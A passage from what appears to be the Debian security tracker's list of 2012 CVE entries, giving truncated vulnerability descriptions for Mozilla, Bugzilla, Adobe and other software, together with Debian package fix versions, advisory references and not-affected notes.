releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4216 (Use-after-free vulnerability in the gfxFont::GetFontEntry function in ...) {DSA-2588-1 DSA-2584-1 DSA-2583-1} - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 CVE-2012-4215 (Use-after-free vulnerability in the ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-4214 (Use-after-free vulnerability in the nsTextEditorState::PrepareEditor ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-4213 (Use-after-free vulnerability in the nsEditor::FindNextLeafNode ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4212 (Use-after-free vulnerability in the XPCWrappedNative::Mark function in ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4211 RESERVED CVE-2012-4210 (The Style Inspector in Mozilla Firefox before 17.0 and Firefox ESR ...) - iceweasel 10.0.11esr-1 [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-4209 (Mozilla Firefox before 17.0, Firefox ESR 10.x before 10.0.11, ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-4208 (The XrayWrapper implementation in Mozilla Firefox before 17.0, ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4207 (The HZ-GB-2312 character-set implementation in Mozilla Firefox before ...) {DSA-2588-1 DSA-2584-1 DSA-2583-1} - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 CVE-2012-4206 (Untrusted search path vulnerability in the installer in Mozilla ...) - iceweasel (Windows-specific) CVE-2012-4205 (Mozilla Firefox before 17.0, Thunderbird before 17.0, and SeaMonkey ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4204 (The str_unescape function in the JavaScript engine in Mozilla Firefox ...) - iceape (Doesn't affect the ESR series, only releases from experimental) - iceweasel (Doesn't affect the ESR series, only releases from experimental) - icedove (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4203 (The New Tab page in Mozilla Firefox before 17.0 uses a privileged ...) - iceweasel (Doesn't affect the ESR series, only releases from experimental) CVE-2012-4202 (Heap-based buffer overflow in the image::RasterImage::DrawFrameTo ...) - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 [squeeze] - iceweasel (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceape (Vulnerable code not present) CVE-2012-4201 (The evalInSandbox implementation in Mozilla Firefox before 17.0, ...) {DSA-2588-1 DSA-2584-1 DSA-2583-1} - iceweasel 10.0.11esr-1 - icedove 10.0.11-1 - iceape 2.7.11-1 CVE-2012-4200 RESERVED CVE-2012-4199 (template/en/default/bug/field-events.js.tmpl in Bugzilla 3.x before ...) - bugzilla (low) [squeeze] - bugzilla (Minor issue) - bugzilla4 (bug #669643) CVE-2012-4198 (The User.get method in Bugzilla/WebService/User.pm in Bugzilla 3.7.x ...) - bugzilla (Only affects 3.7 onwards) - bugzilla4 (bug #669643) CVE-2012-4197 (Bugzilla/Attachment.pm in attachment.cgi in Bugzilla 2.x and 3.x ...) - bugzilla (low) [squeeze] - bugzilla (Minor issue) - bugzilla4 (bug #669643) CVE-2012-4196 (Mozilla Firefox before 16.0.2, Firefox ESR 10.x before 10.0.10, ...) - iceweasel 10.0.10esr-1 - icedove 10.0.10-1 - iceape 2.7.10-1 [squeeze] - iceape (vulnerable code not present) [squeeze] - iceweasel (vulnerable code not present) [squeeze] - icedove (vulnerable code not present) CVE-2012-4195 (The nsLocation::CheckURL function in Mozilla Firefox before 16.0.2, ...) - iceape (Only affects 16.x release from experimental) - iceweasel (Only affects 16.x release from experimental) - icedove (Only affects 16.x release from experimental) CVE-2012-4194 (Mozilla Firefox before 16.0.2, Firefox ESR 10.x before 10.0.10, ...) - iceape 2.7.10-1 - icedove 10.0.10-1 - iceweasel 10.0.10esr-1 [squeeze] - iceape (vulnerable code not present) [squeeze] - iceweasel (vulnerable code not present) [squeeze] - icedove (vulnerable code not present) CVE-2012-4193 (Mozilla Firefox before 16.0.1, Firefox ESR 10.x before 10.0.9, ...) - iceweasel 10.0.9esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (vulnerable code not present) [squeeze] - iceweasel (vulnerable code not present) [squeeze] - icedove (vulnerable code not present) CVE-2012-4192 (Mozilla Firefox 16.0, Thunderbird 16.0, and SeaMonkey 2.13 allow ...) - iceweasel 10.0.9esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Regression not present in Squeeze) [squeeze] - iceweasel (Regression not present in Squeeze) [squeeze] - icedove (Regression not present in Squeeze) CVE-2012-4191 (The mozilla::net::FailDelayManager::Lookup function in the WebSockets ...) - iceweasel (Doesn't affect ESR series) CVE-2012-4190 (The FT2FontEntry::CreateFontEntry function in FreeType, as used in the ...) - iceweasel (Only affects Firefox Mobile) CVE-2012-4189 (Cross-site scripting (XSS) vulnerability in Bugzilla 4.1.x and 4.2.x ...) - bugzilla (Only affects 4.1 onwards) - bugzilla4 (bug #669643) CVE-2012-4188 (Heap-based buffer overflow in the Convolve3x3 function in Mozilla ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-4187 (Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-4186 (Heap-based buffer overflow in the nsWaveReader::DecodeAudioData ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-4185 (Buffer overflow in the nsCharTraits::length function in Mozilla ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-4184 (The Chrome Object Wrapper (COW) implementation in Mozilla Firefox ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-4183 (Use-after-free vulnerability in the DOMSVGTests::GetRequiredFeatures ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-4182 (Use-after-free vulnerability in the nsTextEditRules::WillInsert ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-4181 (Use-after-free vulnerability in the ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-4180 (Heap-based buffer overflow in the ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-4179 (Use-after-free vulnerability in the ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-4178 (SQL injection vulnerability in spywall/includes/deptUploads_data.php ...) NOT-FOR-US: Symantec Web Gateway CVE-2012-4177 (The web browser plugin for Ubisoft Uplay PC before 2.0.4 allows remote ...) NOT-FOR-US: Ubisoft Uplay PC CVE-2012-4176 (Array index error in Adobe Shockwave Player before 11.6.8.638 allows ...) NOT-FOR-US: Adobe Shockwave CVE-2012-4175 (Buffer overflow in Adobe Shockwave Player before 11.6.8.638 allows ...) NOT-FOR-US: Adobe Shockwave CVE-2012-4174 (Buffer overflow in Adobe Shockwave Player before 11.6.8.638 allows ...) NOT-FOR-US: Adobe Shockwave CVE-2012-4173 (Buffer overflow in Adobe Shockwave Player before 11.6.8.638 allows ...) NOT-FOR-US: Adobe Shockwave CVE-2012-4172 (Buffer overflow in Adobe Shockwave Player before 11.6.8.638 allows ...) NOT-FOR-US: Adobe Shockwave CVE-2012-4171 (Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-4170 (Buffer overflow in Adobe Photoshop CS6 13.x before 13.0.1 allows ...) NOT-FOR-US: Adobe Photoshop CS6 CVE-2012-4169 RESERVED CVE-2012-4168 (Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on ...) NOT-FOR-US: Adobe Flash CVE-2012-4167 (Integer overflow in Adobe Flash Player before 10.3.183.23 and 11.x ...) NOT-FOR-US: Adobe Flash CVE-2012-4166 REJECTED CVE-2012-4165 (Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on ...) NOT-FOR-US: Adobe Flash CVE-2012-4164 (Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on ...) NOT-FOR-US: Adobe Flash CVE-2012-4163 (Adobe Flash Player before 10.3.183.23 and 11.x before 11.4.402.265 on ...) NOT-FOR-US: Adobe Flash CVE-2012-4162 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4161 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4160 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4159 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4158 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4157 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4156 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4155 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4154 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4153 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4152 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4151 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4150 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4149 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4148 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2012-4147 (Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on ...) NOT-FOR-US: Adobe Reader CVE-2011-5098 (chef-server-api/app/controllers/clients.rb in Chef Server in Chef ...) - chef 0.10.10-1 CVE-2011-5097 (chef-server-api/app/controllers/cookbooks.rb in Chef Server in Chef ...) - chef 0.10.10-1 CVE-2010-5142 (chef-server-api/app/controllers/users.rb in the API in Chef before ...) - chef 0.10.10-1 CVE-2012-4146 (Opera before 12.01 allows remote attackers to cause a denial of ...) NOT-FOR-US: Opera CVE-2012-4145 (Unspecified vulnerability in Opera before 12.01 on Windows and UNIX, ...) NOT-FOR-US: Opera CVE-2012-4144 (Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x ...) NOT-FOR-US: Opera CVE-2012-4143 (Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x ...) NOT-FOR-US: Opera CVE-2012-4142 (Opera before 12.01 on Windows and UNIX, and before 11.66 and 12.x ...) NOT-FOR-US: Opera CVE-2012-XXXX [redeclipse code execution through map files] - redeclipse 1.2-3 (bug #684143) CVE-2012-XXXX [base name disclosure] - spip 2.1.17-1 (bug #683667) [squeeze] - spip 2.1.1-3squeeze5 CVE-2012-XXXX [insecure default configuration / authentication bypass] - munin 2.0.5-1 (bug #682869) CVE-2012-4141 RESERVED CVE-2012-4140 RESERVED CVE-2012-4139 RESERVED CVE-2012-4138 RESERVED CVE-2012-4137 RESERVED CVE-2012-4136 RESERVED CVE-2012-4135 RESERVED CVE-2012-4134 RESERVED CVE-2012-4133 RESERVED CVE-2012-4132 RESERVED CVE-2012-4131 RESERVED CVE-2012-4130 RESERVED CVE-2012-4129 RESERVED CVE-2012-4128 RESERVED CVE-2012-4127 RESERVED CVE-2012-4126 RESERVED CVE-2012-4125 RESERVED CVE-2012-4124 RESERVED CVE-2012-4123 RESERVED CVE-2012-4122 RESERVED CVE-2012-4121 RESERVED CVE-2012-4120 RESERVED CVE-2012-4119 RESERVED CVE-2012-4118 RESERVED CVE-2012-4117 RESERVED CVE-2012-4116 RESERVED CVE-2012-4115 RESERVED CVE-2012-4114 RESERVED CVE-2012-4113 RESERVED CVE-2012-4112 RESERVED CVE-2012-4111 RESERVED CVE-2012-4110 RESERVED CVE-2012-4109 RESERVED CVE-2012-4108 RESERVED CVE-2012-4107 RESERVED CVE-2012-4106 RESERVED CVE-2012-4105 RESERVED CVE-2012-4104 RESERVED CVE-2012-4103 RESERVED CVE-2012-4102 RESERVED CVE-2012-4101 RESERVED CVE-2012-4100 RESERVED CVE-2012-4099 RESERVED CVE-2012-4098 RESERVED CVE-2012-4097 RESERVED CVE-2012-4096 RESERVED CVE-2012-4095 RESERVED CVE-2012-4094 RESERVED CVE-2012-4093 RESERVED CVE-2012-4092 RESERVED CVE-2012-4091 RESERVED CVE-2012-4090 RESERVED CVE-2012-4089 RESERVED CVE-2012-4088 RESERVED CVE-2012-4087 RESERVED CVE-2012-4086 RESERVED CVE-2012-4085 RESERVED CVE-2012-4084 RESERVED CVE-2012-4083 RESERVED CVE-2012-4082 RESERVED CVE-2012-4081 RESERVED CVE-2012-4080 RESERVED CVE-2012-4079 RESERVED CVE-2012-4078 RESERVED CVE-2012-4077 RESERVED CVE-2012-4076 RESERVED CVE-2012-4075 RESERVED CVE-2012-4074 RESERVED CVE-2012-4073 RESERVED CVE-2012-4072 RESERVED CVE-2012-4071 (Cross-site scripting (XSS) vulnerability in the comments module in the ...) NOT-FOR-US: Joomla addon CVE-2012-4070 (SQL injection vulnerability in system/src/dispatcher.php in Dir2web ...) NOT-FOR-US: Dir2Web CVE-2012-4069 (Dir2web 3.0 stores sensitive information under the web root with ...) NOT-FOR-US: Dir2Web CVE-2012-4068 (Heap-based buffer overflow in the SoapServer service in Citrix ...) NOT-FOR-US: Citrix CVE-2012-4067 [Walrus XML parsing allows document type declaration] RESERVED - eucalyptus (bug #707592) NOTE: https://github.com/eucalyptus/eucalyptus/commit/e958e60 NOTE: https://eucalyptus.atlassian.net/browse/EUCA-5277 CVE-2012-4066 (The internal message protocol for Walrus in Eucalyptus 3.2.0 and ...) - eucalyptus (bug #702388) CVE-2012-4065 (Eucalyptus before 3.1.1 does not properly restrict the binding of ...) - eucalyptus 3.1.0-9 (bug #689599) CVE-2012-4064 (Eucalyptus before 3.1.1 does not properly restrict the binding of ...) - eucalyptus 3.1.0-9 (bug #689599) CVE-2012-4063 (The Apache Santuario configuration in Eucalyptus before 3.1.1 does not ...) - eucalyptus 3.1.0-9 (bug #689599) CVE-2012-4062 RESERVED CVE-2012-4061 (Multiple SQL injection vulnerabilities in ASP-DEv XM Diary allow ...) NOT-FOR-US: ASP-DEv XM Diary CVE-2012-4060 (Multiple SQL injection vulnerabilities in ASP-DEv XM Forums RC3 allow ...) NOT-FOR-US: ASP-DEv XM Diary CVE-2012-4059 (Cross-site request forgery (CSRF) vulnerability in home/secretqtn.php ...) NOT-FOR-US: Socketmail not in Debian CVE-2012-4058 (Cross-site scripting (XSS) vulnerability in SocketMail Pro 2.2.9 ...) NOT-FOR-US: Socketmail not in Debian CVE-2012-4057 (Buffer overflow in the Player in Remote-Anything 5.60.15 allows remote ...) NOT-FOR-US: Remote-Anything not in Debian CVE-2012-4056 (SQL injection vulnerability in index2.php in Uiga Personal Portal ...) NOT-FOR-US: Uiga personal portal CVE-2012-4055 (SQL injection vulnerability in index2.php in Uiga Fan Club allows ...) NOT-FOR-US: Uiga Fan Club CVE-2012-4054 (Buffer overflow in the readfile function in CPE17 Autorun Killer 1.7.1 ...) NOT-FOR-US: CPE17 Autorun Killer not in Debian CVE-2012-4053 (Cross-site request forgery (CSRF) vulnerability in eZOE flash player ...) NOT-FOR-US: eZOE flash player not in Debian CVE-2012-4052 (Multiple cross-site scripting (XSS) vulnerabilities in Jease before ...) NOT-FOR-US: Jease CVE-2012-4051 (Multiple cross-site request forgery (CSRF) vulnerabilities in ...) NOT-FOR-US: JAMF Casper suite CVE-2007-6754 (The ipalloc function in libc/stdlib/malloc.c in jemalloc in libc for ...) NOT-FOR-US: NetBSD/FreeBSD libc CVE-2006-7252 (Integer overflow in the calloc function in libc/stdlib/malloc.c in ...) NOT-FOR-US: NetBSD/FreeBSD libc CVE-2005-4895 (Multiple integer overflows in TCMalloc (tcmalloc.cc) in gperftools ...) - google-perftools 0.7-1 CVE-2012-4047 RESERVED CVE-2012-4046 (The D-Link DCS-932L camera with firmware 1.02 allows remote attackers ...) NOT-FOR-US: D-Link DCS-932L camera CVE-2012-4045 (Multiple heap-based buffer overflows in bmp.w5s in Winamp before 5.63 ...) NOT-FOR-US: Winamp CVE-2012-4044 RESERVED CVE-2012-4043 (Cross-site scripting (XSS) vulnerability in global-protect/login.esp ...) NOT-FOR-US: Palo Alto Networks software, not in Debian CVE-2012-4042 RESERVED CVE-2012-4041 RESERVED CVE-2012-4040 RESERVED CVE-2012-4039 RESERVED CVE-2012-4038 RESERVED CVE-2012-4037 (Multiple cross-site scripting (XSS) vulnerabilities in the web client ...) - transmission 2.52-3 (bug #683380) [squeeze] - transmission (Version in Stable not affected) CVE-2012-4036 (Unrestricted file upload vulnerability in admin.php in PBBoard 2.1.4 ...) NOT-FOR-US: PBBoard CVE-2012-4035 (The new_password page in PBBoard 2.1.4 allows remote attackers to ...) NOT-FOR-US: PBBoard CVE-2012-4034 (Multiple SQL injection vulnerabilities in PBBoard 2.1.4 allow remote ...) NOT-FOR-US: PBBoard CVE-2012-4050 (Multiple unspecified vulnerabilities in Google Chrome OS before ...) NOT-FOR-US: Google Chrome OS CVE-2012-4049 (epan/dissectors/packet-nfs.c in the NFS dissector in Wireshark 1.4.x ...) - wireshark 1.8.2-1 [squeeze] - wireshark (Vulnerable code not present) NOTE: http://www.wireshark.org/security/wnpa-sec-2012-12.html NOTE: http://www.openwall.com/lists/oss-security/2012/07/24/1 NOTE: http://www.openwall.com/lists/oss-security/2012/07/24/2 CVE-2012-4048 (The PPP dissector in Wireshark 1.4.x before 1.4.14, 1.6.x before ...) {DSA-2590-1} - wireshark 1.8.2-1 (bug #680056) NOTE: http://www.wireshark.org/security/wnpa-sec-2012-11.html NOTE: http://www.openwall.com/lists/oss-security/2012/07/24/1 NOTE: http://www.openwall.com/lists/oss-security/2012/07/24/2 CVE-2012-4033 (Multiple unspecified vulnerabilities in the Zingiri Web Shop plugin ...) NOT-FOR-US: Zingiri not in Debian CVE-2012-4032 (Open redirect vulnerability in the login page in WebsitePanel before ...) NOT-FOR-US: WebsitePanel not in Debian CVE-2012-4031 (Multiple directory traversal vulnerabilities in src/acloglogin.php in ...) NOT-FOR-US: Wangkongbao not in Debian CVE-2012-4030 RESERVED CVE-2012-4029 RESERVED CVE-2012-4028 (Tridium Niagara AX Framework does not properly store credential data, ...) NOT-FOR-US: Tridium Niagara AX Framework CVE-2012-4027 (Directory traversal vulnerability in Tridium Niagara AX Framework ...) NOT-FOR-US: Tridium Niagara AX Framework CVE-2012-4026 (The Johnson Controls Pegasys P2000 server with software before 3.11 ...) NOT-FOR-US: The Johnson Controls Pegasys P2000 CVE-2012-4025 (Integer overflow in the queue_init function in unsquashfs.c in ...) - squashfs-tools 1:4.2+20121212-1 (low; bug #683371) [squeeze] - squashfs-tools (Minor issue) [wheezy] - squashfs-tools (Minor issue) CVE-2012-4024 (Stack-based buffer overflow in the get_component function in ...) - squashfs-tools 1:4.2+20121212-1 (low; bug #683371) [squeeze] - squashfs-tools (Minor issue) [wheezy] - squashfs-tools (Minor issue) CVE-2012-4023 (CRLF injection vulnerability in Pebble before 2.6.4 allows remote ...) NOT-FOR-US: Pebble blog CVE-2012-4022 (Pebble before 2.6.4 allows remote attackers to trigger loss of ...) NOT-FOR-US: Pebble blog CVE-2012-4021 (MosP kintai kanri before 4.1.0 does not properly perform ...) NOT-FOR-US: MosP kintai kanri CVE-2012-4020 (MosP kintai kanri before 4.1.0 does not enforce privilege ...) NOT-FOR-US: MosP kintai kanri CVE-2012-4019 (Cross-site scripting (XSS) vulnerability in tokyo_bbs.cgi in Come on ...) NOT-FOR-US: Come on Girls Interface (CGI) Tokyo BBS CVE-2012-4018 (Cross-site scripting (XSS) vulnerability in Final Beta Laboratory ...) NOT-FOR-US: Final Beta Laboratory MyWebSearch CVE-2012-4017 (The jigbrowser+ application before 1.5.0 for Android does not properly ...) NOT-FOR-US: Android application CVE-2012-4016 (The ATOK application before 1.0.4 for Android allows remote attackers ...) NOT-FOR-US: Android application CVE-2012-4015 (Cross-site scripting (XSS) vulnerability in the management screen in ...) NOT-FOR-US: My Little tool / My little admin SQL server 2000 CVE-2012-4014 (Unspecified vulnerability in McAfee Email Anti-virus (formerly ...) NOT-FOR-US: McAfee Email Anti-virus CVE-2012-4013 (The WebView class in the Cybozu KUNAI Browser for Remote Service ...) NOT-FOR-US: Cybozu KUNAI Browser CVE-2012-4012 (The WebView class in the Cybozu KUNAI application before 2.0.6 for ...) NOT-FOR-US: Cybozu KUNAI CVE-2012-4011 (The Cybozu KUNAI application before 2.0.6 for Android allows remote ...) NOT-FOR-US: Cybozu KUNAI CVE-2012-4010 (Opera before 11.60 allows remote attackers to spoof the address bar ...) NOT-FOR-US: Opera CVE-2012-4009 (The WebView class in the Cybozu Live application 1.0.4 and earlier for ...) NOT-FOR-US: Cybozu Live CVE-2012-4008 (The Cybozu Live application 1.0.4 and earlier for Android allows ...) NOT-FOR-US: Cybozu Live CVE-2012-4007 (The mixi application before 4.3.0 for Android allows remote attackers ...) NOT-FOR-US: mixi application for Android CVE-2012-4006 (The GREE application before 1.4.0, GREE Tanken Dorirando application ...) NOT-FOR-US: GREE application for Android CVE-2012-4005 (The NHN Japan NAVER LINE application before 2.5.5 for Android does not ...) NOT-FOR-US: NHN Japan NAVER LINE CVE-2012-4004 (Cross-site scripting (XSS) vulnerability in the Sleipnir Mobile ...) NOT-FOR-US: Sleipnir Mobile CVE-2012-4003 (Multiple cross-site scripting (XSS) vulnerabilities in GLPI-PROJECT ...) - glpi 0.83.31-1 (unimportant) NOTE: Only supported behind an authenticated HTTP zone NOTE: https://forge.indepnet.net/projects/glpi/versions/771 NOTE: http://www.openwall.com/lists/oss-security/2012/07/13/1 CVE-2012-4002 (Cross-site request forgery (CSRF) vulnerability in GLPI-PROJECT GLPI ...) - glpi 0.83.31-1 (unimportant) NOTE: Only supported behind an authenticated HTTP zone NOTE: https://forge.indepnet.net/projects/glpi/versions/771 NOTE: http://www.openwall.com/lists/oss-security/2012/07/13/1 CVE-2012-4001 (The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server ...) NOT-FOR-US: mod_pagespeed CVE-2012-4000 (Cross-site scripting (XSS) vulnerability in the print_textinputs_var ...) {DSA-2522-1} - fckeditor 1:2.6.6-3 (bug #683418) NOTE: http://disse.cting.org/2012/06/22/fckeditor-reflected-xss-vulnerability/ CVE-2012-3999 (Cross-site scripting (XSS) vulnerability in admin/login.php in Sticky ...) NOT-FOR-US: Sticky Notes CVE-2012-3998 (Multiple SQL injection vulnerabilities in Sticky Notes before ...) NOT-FOR-US: Sticky Notes CVE-2012-3997 (Multiple cross-site scripting (XSS) vulnerabilities in Sticky Notes ...) NOT-FOR-US: Sticky Notes CVE-2012-3996 (TikiWiki CMS/Groupware 8.3 and earlier allows remote attackers to ...) - tikiwiki CVE-2012-3995 (The IsCSSWordSpacingSpace function in Mozilla Firefox before 16.0, ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3994 (Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3993 (The Chrome Object Wrapper (COW) implementation in Mozilla Firefox ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3992 (Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3991 (Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-3990 (Use-after-free vulnerability in the IME State Manager implementation ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-3989 (Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey ...) - iceweasel (Only affects Firefox >= 10) - icedove (Only affects Firefox >= 10) - iceape (Only affects Firefox >= 10) CVE-2012-3988 (Use-after-free vulnerability in Mozilla Firefox before 16.0, Firefox ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3987 (Mozilla Firefox before 16.0 on Android assigns chrome privileges to ...) - iceweasel (Android-specific) CVE-2012-3986 (Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-3985 (Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey ...) - iceweasel (Only affects Firefox >= 10) - icedove (Only affects Firefox >= 10) - iceape (Only affects Firefox >= 10) CVE-2012-3984 (Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey ...) - iceweasel (Only affects Firefox >= 10) - icedove (Only affects Firefox >= 10) - iceape (Only affects Firefox >= 10) CVE-2012-3983 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel (Only affects Firefox >= 10) - icedove (Only affects Firefox >= 10) - iceape (Only affects Firefox >= 10) CVE-2012-3982 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-4747 (Bugzilla 2.x and 3.x through 3.6.11, 3.7.x and 4.0.x before 4.0.8, ...) - bugzilla (low) [squeeze] - bugzilla (Minor issue) - bugzilla4 (bug #669643) NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=785522 NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=785511 CVE-2012-3981 (Auth/Verify/LDAP.pm in Bugzilla 2.x and 3.x before 3.6.11, 3.7.x and ...) - bugzilla 